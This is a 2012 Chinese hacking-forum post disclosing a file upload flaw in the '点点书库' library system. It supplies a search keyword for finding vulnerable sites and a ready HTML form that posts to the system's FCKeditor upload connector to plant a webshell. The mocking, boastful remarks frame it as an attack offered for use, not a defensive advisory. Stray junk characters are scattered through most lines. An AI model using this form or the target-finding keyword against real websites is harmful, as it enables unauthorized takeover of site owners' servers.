找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7582|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞
" U/ m0 r" K: q6 }+ y 作者:冰锋刺客8 v9 A- r" x* b% T" M- M( }0 N
厂商:点击书(dianjishu.com)
% @7 R( C- h/ S 日期:2012-6-21
, ]% z3 y& o9 A; n2 u9 I- U6 a
* p$ b9 P$ `' ?# p( VI 概述
8 d: x4 ]1 O: E) G' a/ m! ^   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
; L" \9 J9 C) G) a2 c$ A II 简介
' k$ V+ A7 r  K5 \   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
" {; r1 E1 P5 m7 l9 c  H! q# K* y" i3 o 补充一个漏洞
7 j, ?2 B" E/ g( y$ V7 N" ] <form id="frmUpload" enctype="multipart/form-data"% s% Z7 ~7 V. m1 V# [
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>8 c' X. P& {- {% `
<input id="btnUpload" type="submit" value="操翻他">
) P+ Z/ ?+ F* z1 l& o# W </form>5 k9 C' F  R/ @& v+ F! i' I7 k
你们懂的- ?2 E0 G% c* p& X) o1 i
那傻逼提供还需要改包.
2 t; ], W  t2 d2 y$ x5 w9 Z; y 自己看了下源代码发现fckeditor
0 I5 Z$ ]( ?; B, S6 G6 [9 r 直接秒杀
* l9 v: ^! J' r: l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表